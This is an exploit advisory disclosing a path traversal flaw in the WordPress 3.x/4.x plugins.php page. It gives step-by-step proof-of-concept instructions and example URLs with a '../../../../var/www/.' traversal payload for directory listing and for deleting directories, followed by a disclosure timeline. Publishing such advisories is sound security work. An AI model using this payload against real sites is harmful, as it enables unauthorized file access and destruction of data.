######################
# Exploit Title : WordPress 3.x, 4.x Path Traversal + Directory Listing + File Deletion Vulnerabilities
# Exploit Author : Claudio Viviani
# Vendor Homepage : https://wordpress.org
# Software Link : http://wordpress.org/wordpress-3.9.2.tar.gz
# Date : 2014-07-11
# Tested on : Mozilla Firefox / WordPress 4.0 beta 1
# Mozilla Firefox / WordPress 4.0 beta 2
# Mozilla Firefox / WordPress 4.0 beta 3
# Mozilla Firefox / WordPress 3.9.2
# Mozilla Firefox / WordPress 3.9.1
# Mozilla Firefox / WordPress 3.8
# Mozilla Firefox / WordPress 3.7
######################
# Location :
http://victim/wp-admin/plugins.php
######################
# Description :
An admin user could read directories contents or delete writable directories.
######################
# PoC Path Traversal + Directory Listing
1) Choose a plugin
2) Click on "Deactivate" and "Delete" buttons
3) Replace plugin location with target directory in the url.
Example: http://localhost/wp-admin/plugins.php?action=delete-selected&checked[0]=../../../../var/www/.&plugin_status=all&paged=1&s&_wpnonce=1154979245
4) Click on "Click to view entire list of files which will be delete" link.
# PoC Path Traversal + File Deletion (WARNING!!! The directories selected will be deleted!!!)
1) Choose a plugin
2) Click on "Deactivate" and "Delete" buttons
3) Replace plugin location with target directory in the url.
Example: http://localhost/wp-admin/plugins.php?action=delete-selected&checked[0]=../../../../var/www/.&plugin_status=all&paged=1&s&_wpnonce=1154979245
4) Click on "Yes delete these files"
# PoC video is available at:
https://www.youtube.com/watch?v=yVtIA82ZJuA
######################
# Vulnerability Disclosure Timeline:
2014-07-10: Discovered vulnerability
2014-07-10: Vendor Notification (WordPress Security e-mail address)
2014-07-10: Vendor Response/Feedback (Andrew Nacin - Lead Developer WordPress)
2014-08-06: 3.9.2 has been released but not fixed
2014-08-06: Public Disclosure
#####################
Discovered By : Claudio Viviani
http://www.homelab.it
[email protected]
[email protected]
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################